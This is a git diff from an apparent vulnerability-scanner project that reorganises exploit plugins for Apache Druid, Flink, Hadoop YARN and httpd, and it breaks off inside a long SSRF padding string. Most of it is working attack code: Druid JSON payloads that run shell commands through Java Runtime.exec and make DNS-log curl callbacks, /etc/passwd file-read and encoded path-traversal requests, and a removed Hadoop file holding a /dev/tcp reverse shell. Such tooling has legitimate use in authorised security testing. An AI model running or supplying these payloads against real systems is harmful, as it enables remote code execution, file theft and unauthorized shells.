{"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + # * path不一样 + { + 'path': 'indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + { + 'path': 'indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + { + 'path': 'indexer/v1/sampler?for=connect', + 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' + }, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheDruid', + 'vul_type': 'FileRead', + 'vul_id': 'CVE-2021-36749', + } + + headers = { + 'Content-Type': 'application/json;charset=utf-8', + 'Referer': client.protocol_domain, + 'Origin': client.protocol_domain, + } + + for payload in self.payloads: + path = payload['path'] + data = payload['data'] + + res = client.request( + 'post', + path, + data=data, + headers=headers, + allow_redirects=False, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res_fileread(res.text)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheDruid/cve_2021_25646.py b/payloads/ApacheDruid/cve_2021_25646.py deleted file mode 100644 index a5a4ec0..0000000 --- a/payloads/ApacheDruid/cve_2021_25646.py +++ /dev/null @@ -1,94 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.api.dns import dns -from lib.tool.md5 import random_md5 -from lib.tool import check -from time import sleep - -# * 有回显/无回显 Payload -cve_2021_25646_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema": {"dataSource": "%%DATASOURCE%%","parser": {"parseSpec": {"format": "javascript","timestampSpec": {},"dimensionsSpec": {},"function": "function(){var s = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\"COMMAND\\").getInputStream()).useDelimiter(\\"\\\\A\\").next();return {timestamp:\\"2013-09-01T12:41:27Z\\",test: s}}","": {"enabled": "true"}}}}},"samplerConfig": {"numRows": 10}}''' -cve_2021_25646_no_data = '''{"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"local","baseDir":"quickstart/tutorial/","filter":"wikiticker-2015-09-12-sampled.json.gz"}},"dataSchema":{"dataSource":"sample","parser":{"type":"string","parseSpec":{"format":"json","timestampSpec":{"column":"time","format":"iso"},"dimensionsSpec":{}}},"transformSpec":{"transforms":[],"filter":{"type":"javascript","function":"function(value){return java.lang.Runtime.getRuntime().exec('COMMAND')}","dimension":"added","":{"enabled":"true"}}}}},"samplerConfig":{"numRows":5,"cacheKey":"79a5be988bf94d42a6f219b63ff27383"}}''' - -random_str = random_md5(6) # * 随机6位字符串 - -cve_2021_25646_payloads = [ - # ! 回显POC - { - 'path': 'druid/indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + random_str) - }, - { - 'path': 'indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_data.replace('COMMAND', 'echo ' + random_str) - }, - # ! 无回显POC - { - 'path': 'druid/indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_no_data.replace('COMMAND', 'curl DNSDOMAIN') - }, - { - 'path': 'druid/indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_no_data.replace('COMMAND', 'curl http://DNSDOMAIN') - }, - { - 'path': 'druid/indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_no_data.replace('COMMAND', 'ping -c 4 DNSDOMAIN') - }, - { - 'path': 'druid/indexer/v1/sampler?for=filter', - 'data': cve_2021_25646_no_data.replace('COMMAND', 'ping DNSDOMAIN') - }, -] - -def cve_2021_25646_scan(clients): - ''' Apache Druid 包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码, - 此功能在用于高信任度环境中, 默认已被禁用 - 但是, 在 Druid 0.20.0及更低版本中, - 经过身份验证的用户可以构造传入的json串来控制一些敏感的参数发送恶意请求, - 利用 Apache Druid 漏洞可以执行任意代码 - ''' - client = clients.get('reqClient') - sessid = '244d164411e9b78ca7074ec47f2c4f96' - - vul_info = { - 'app_name': 'ApacheDruid', - 'vul_type': 'RCE', - 'vul_id': 'CVE-2021-25646', - } - - headers = { - 'Content-Type': 'application/json;charset=utf-8', - 'Referer': client.protocol_domain, - 'Origin': client.protocol_domain, - } - - for payload in cve_2021_25646_payloads: - dns_md = random_md5() # * 随机md5值, 8位 - dns_domain = dns_md + '.' + dns.domain(sessid) # * dnslog/ceye域名 - - path = payload['path'] - data = payload['data'].replace('DNSDOMAIN', dns_domain) - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - sleep(3) # * dnslog可能较慢, 等一会 - if (check.check_res(res.text, random_str) - or dns.result(dns_md, sessid) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheDruid/cve_2021_36749.py b/payloads/ApacheDruid/cve_2021_36749.py deleted file mode 100644 index 9e425b2..0000000 --- a/payloads/ApacheDruid/cve_2021_36749.py +++ /dev/null @@ -1,77 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool import check - -cve_2021_36749_payloads = [ - { - 'path': 'druid/indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, - { - 'path': 'druid/indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, - { - 'path': 'druid/indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, - # * path不一样 - { - 'path': 'indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"type": "index","ioConfig": {"type": "index","firehose": {"type": "http","uris": ["file:///etc/passwd"]}},"dataSchema": {"dataSource": "sample","parser": {"type": "string","parseSpec": {"format": "regex","pattern": "(.*)","columns": ["a"],"dimensionsSpec": {},"timestampSpec": {"column": "!!!_no_such_column_!!!","missingValue": "2010-01-01T00:00:00Z"}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, - { - 'path': 'indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","inputSource": {"type": "local","baseDir": "/etc/","filter": "passwd"},"inputFormat": {"type": "json","keepNullColumns": true}},"dataSchema": {"dataSource": "sample","timestampSpec": {"column": "timestamp","format": "iso","missingValue": "1970"},"dimensionsSpec": {}}},"type": "index","tuningConfig": {"type": "index"}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, - { - 'path': 'indexer/v1/sampler?for=connect', - 'data': '''{"type": "index","spec": {"ioConfig": {"type": "index","firehose": {"type": "local","baseDir": "/etc/","filter": "passwd"}},"dataSchema": {"dataSource": "sample","parser": {"parseSpec": {"format": "json","timestampSpec": {},"dimensionsSpec": {}}}}},"samplerConfig": {"numRows": 500,"timeoutMs": 15000}}''' - }, -] - -def cve_2021_36749_scan(clients): - ''' Apache Druid对用户指定的HTTP InputSource没有做限制, - 并且Apache Druid默认管理页面是不需要认证即可访问的 - 因此未经授权的远程攻击者 可以通过构造恶意参数读取服务器上的任意文件 - - Apache Druid <= 0.21.1 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheDruid', - 'vul_type': 'FileRead', - 'vul_id': 'CVE-2021-36749', - } - - headers = { - 'Content-Type': 'application/json;charset=utf-8', - 'Referer': client.protocol_domain, - 'Origin': client.protocol_domain, - } - - for payload in cve_2021_36749_payloads: - path = payload['path'] - data = payload['data'] - - res = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res_fileread(res.text)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheDruid/main.py b/payloads/ApacheDruid/main.py deleted file mode 100644 index 70abfcc..0000000 --- a/payloads/ApacheDruid/main.py +++ /dev/null @@ -1,39 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' -Apache Druid 是一个集时间序列数据库、数据仓库和全文检索系统特点于一体的分析性数据平台 (不支持Windows平台) - Apache Druid扫描类: - 1. Apache Druid 远程代码执行 - CVE-2021-25646 - Payload: https://www.freebuf.com/vuls/263276.html - https://cloud.tencent.com/developer/article/1797515 - - 2. Apache Druid任意文件读取 - CVE-2021-36749 - Payload: https://cloud.tencent.com/developer/article/1942458 - -file:///etc/passwd -file:///C:/Windows/System32/drivers/etc/hosts -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheDruid.cve_2021_25646 import cve_2021_25646_scan -from payloads.ApacheDruid.cve_2021_36749 import cve_2021_36749_scan - -class ApacheDruid(): - def __init__(self): - self.app_name = 'ApacheDruid' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2021_25646_scan, clients=clients), - thread(target=cve_2021_36749_scan, clients=clients), - ] - -apachedruid = ApacheDruid() diff --git a/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py b/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py new file mode 100644 index 0000000..f04e488 --- /dev/null +++ b/payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py @@ -0,0 +1,60 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Flink 任意文件读取 + CVE-2020-17519 + Payload: https://vulhub.org/#/environments/flink/CVE-2020-17519/ + +Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布) + 允许攻击者通过JobManager进程的REST接口, 读取JobManager本地文件系统上的任意文件 +''' + +from PluginManager import Vuln_Scan +from lib.tool import check + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, + {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, + {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'}, + {'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'}, + {'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'}, + {'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts'} + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheFlink', + 'vul_type': 'FileRead', + 'vul_id': 'CVE-2020-17519', + } + + for payload in self.payloads: + path = payload['path'] + + res = client.request( + 'get', + path, + vul_info=vul_info + ) + if res is None: + continue + + if (check.check_res_fileread(res.text)): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheFlink/cve_2020_17519.py b/payloads/ApacheFlink/cve_2020_17519.py deleted file mode 100644 index d04fb72..0000000 --- a/payloads/ApacheFlink/cve_2020_17519.py +++ /dev/null @@ -1,56 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -from lib.tool import check - -cve_2020_17519_payloads = [ - { - 'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd', - }, - { - 'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd', - }, - { - 'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd', - }, - { - 'path': 'jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts', - }, - { - 'path': 'logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts', - }, - { - 'path': '..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fC:%252fWindows%252fSystem32%252fdrivers%252fetc%252fhosts', - } -] - -def cve_2020_17519_scan(clients): - ''' Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布) - 允许攻击者通过JobManager进程的REST接口, 读取JobManager本地文件系统上的任意文件 ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheFlink', - 'vul_type': 'FileRead', - 'vul_id': 'CVE-2020-17519', - } - - for payload in cve_2020_17519_payloads: # * Payload - path = payload['path'] # * Path - - res = client.request( - 'get', - path, - vul_info=vul_info - ) - if res is None: - continue - - if (check.check_res_fileread(res.text)): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res - } - return results - return None diff --git a/payloads/ApacheFlink/main.py b/payloads/ApacheFlink/main.py deleted file mode 100644 index 7e4f1be..0000000 --- a/payloads/ApacheFlink/main.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - ApacheFlink扫描类: - Flink 任意文件读取 - CVE-2020-17519 -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheFlink.cve_2020_17519 import cve_2020_17519_scan - -class Flink(): - def __init__(self): - self.app_name = 'ApacheFlink' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=cve_2020_17519_scan, clients=clients) - ] - -flink = Flink() \ No newline at end of file diff --git a/payloads/ApacheHadoop/apache-hadoop-unauth.py b/payloads/ApacheHadoop/apache-hadoop-unauth.py new file mode 100644 index 0000000..29be8c9 --- /dev/null +++ b/payloads/ApacheHadoop/apache-hadoop-unauth.py @@ -0,0 +1,73 @@ +#!/usr/bin/env python3 +# -*- coding:utf-8 -*- + +''' +Hadoop YARN ResourceManager 未授权访问 + 暂无编号 + Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ + +YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, + 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 +''' + +from PluginManager import Vuln_Scan + +class Scan(Vuln_Scan): + def __init__(self): + self.payloads = [ + {'path': ''}, + {'path': 'cluster'}, + {'path': 'cluster/cluster'}, + {'path': 'cluster/nodes'}, + {'path': 'cluster/nodelabels'}, + {'path': 'cluster/apps'}, + {'path': 'cluster/scheduler'}, + ] + + def POC(self, clients): + client = clients.get('reqClient') + + vul_info = { + 'app_name': 'ApacheHadoop', + 'vul_type': 'unAuthorized', + 'vul_id': 'ApacheHadoop-unAuth', + } + + for payload in self.payloads: + path = payload['path'] + + res = client.request( + 'get', + path, + vul_info=vul_info + ) + if res is None: + continue + + if (( + 'parseHadoopID' in res.text + and 'renderHadoopDate' in res.text + and 'parseHadoopProgress' in res.text) + or ( + 'src="/static/hadoop-st.png"' in res.text + and 'href="/jmx?qry=Hadoop:*"' in res.text + and 'org.apache.hadoop.yarn.server.resourcemanager' in res.text + and 'Hadoop version' in res.text) + or ( + '' in res.text + and 'Server metrics' in res.text) + ): + results = { + 'Target': res.request.url, + 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], + 'Exploit': 'https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py', + 'Request': res + } + return results + return None + + def EXP(self, clients): + pass + + def Start(self, clients): + return self.POC(clients) diff --git a/payloads/ApacheHadoop/main.py b/payloads/ApacheHadoop/main.py deleted file mode 100644 index af9e29c..0000000 --- a/payloads/ApacheHadoop/main.py +++ /dev/null @@ -1,30 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -''' - - Apache Hadoop扫描类: - Hadoop YARN ResourceManager 未授权访问 - 暂无编号 - Payload: https://vulhub.org/#/environments/hadoop/unauthorized-yarn/ -file:///etc/passwd -file:///C:\Windows\System32\drivers\etc\hosts -''' - -# from lib.initial.config import config -from lib.tool.thread import thread -from payloads.ApacheHadoop.new_unauth import unauth_scan - -class ApacheHadoop(): - def __init__(self): - self.app_name = 'ApacheHadoop' - - def addscan(self, clients, vuln=None): - if vuln: - return eval('thread(target={}_scan, clients=clients)'.format(vuln)) - - return [ - thread(target=unauth_scan, clients=clients) - ] - -hadoop = ApacheHadoop() diff --git a/payloads/ApacheHadoop/new_unauth.py b/payloads/ApacheHadoop/new_unauth.py deleted file mode 100644 index 25326ab..0000000 --- a/payloads/ApacheHadoop/new_unauth.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -unauth_payloads = [ - {'path': ''}, - {'path': 'cluster'}, - {'path': 'cluster/cluster'}, - {'path': 'cluster/nodes'}, - {'path': 'cluster/nodelabels'}, - {'path': 'cluster/apps'}, - {'path': 'cluster/scheduler'}, -] - -def unauth_scan(clients): - ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, - 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 - ''' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheHadoop', - 'vul_type': 'unAuthorized', - 'vul_id': 'ApacheHadoop-unAuth', - } - - for payload in unauth_payloads: - path = payload['path'] - - res = client.request( - 'get', - path, - vul_info=vul_info - ) - if res is None: - continue - - if (( - 'parseHadoopID' in res.text - and 'renderHadoopDate' in res.text - and 'parseHadoopProgress' in res.text) - or ( - 'src="/static/hadoop-st.png"' in res.text - and 'href="/jmx?qry=Hadoop:*"' in res.text - and 'org.apache.hadoop.yarn.server.resourcemanager' in res.text - and 'Hadoop version' in res.text) - or ( - '' in res.text - and 'Server metrics' in res.text) - ): - results = { - 'Target': res.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Exploit': 'https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py', - 'Request': res - } - return results - return None diff --git a/payloads/ApacheHadoop/old_unauth.py b/payloads/ApacheHadoop/old_unauth.py deleted file mode 100644 index 4c65ac6..0000000 --- a/payloads/ApacheHadoop/old_unauth.py +++ /dev/null @@ -1,99 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding:utf-8 -*- - -unauthorized_payloads = [ - { - 'path': 'ws/v1/cluster/apps/new-application', - 'data': '' - }, - # { - # 'path': 'ws/v1/cluster/apps', - # 'data': { - # 'application-id': '', - # 'application-name': 'mouse', - # 'am-container-spec': { - # 'commands': { - # 'command': 'curl DNSdomain', # * ping或curl无效, 放弃 - # }, - # }, - # 'application-type': 'YARN', - # } - # }, - { - 'path': 'ws/v1/cluster/apps', - 'data': { - 'application-id': '', - 'application-name': 'mouse', - 'am-container-spec': { - 'commands': { - 'command': '/bin/bash >& /dev/tcp/ip/port 0>&1', - }, - }, - 'application-type': 'YARN', - } - }, -] - -def apache_hadoop_unauthorized_scan(self, clients): - ''' YARN默认开放REST API, 允许用户直接通过API进行相关的应用创建、任务提交执行等操作, - 如果配置不当, 将会导致REST API未授权访问, 攻击者可利用其执行远程命令 - ''' - # sessid = '3861eb6b3d023d464efe85aa01277d27' - client = clients.get('reqClient') - - vul_info = { - 'app_name': 'ApacheHadoop', - 'vul_type': 'unAuthorized', - 'vul_id': 'ApacheHadoop-unAuth', - } - - headers = { - 'Content-Type': 'application/json' - } - - for payload in range(len(unauthorized_payloads)): - # md = random_md5() # * 随机md5值, 8位 - # dns_domain = md + '.' + dns.domain(sessid) # * dnslog/ceye域名 - - path = unauthorized_payloads[payload]['path'] - data = unauthorized_payloads[payload]['data'] - - if (payload == 0): # * 获取application-id - res1 = client.request( - 'post', - path, - data=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - - try: - if (res1.json()['application-id']): - self.application_id = res1.json()['application-id'] - continue - except: - return None - - # command = data['am-container-spec']['commands']['command'] - # data['am-container-spec']['commands']['command'] = command.replace('DNSdomain', dns_domain) - data['application-id'] = self.application_id - - res2 = client.request( - 'post', - json=data, - headers=headers, - allow_redirects=False, - vul_info=vul_info - ) - if res2 is None: - continue - - if (res2.status_code == 202): - results = { - 'Target': res2.request.url, - 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], - 'Request': res2 - } - return results - return None diff --git a/payloads/ApacheHttpd/cve_2021_40438.py b/payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py similarity index 71% rename from payloads/ApacheHttpd/cve_2021_40438.py rename to payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py index 5d7e047..c815994 100644 --- a/payloads/ApacheHttpd/cve_2021_40438.py +++ b/payloads/ApacheHttpd/apache-httpd-cve-2021-40438-ssrf.py @@ -1,45 +1,59 @@ #!/usr/bin/env python3 # -*- coding:utf-8 -*- -# from lib.tool import check - -cve_2021_40438_payloads = [ - { - 'path': '?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA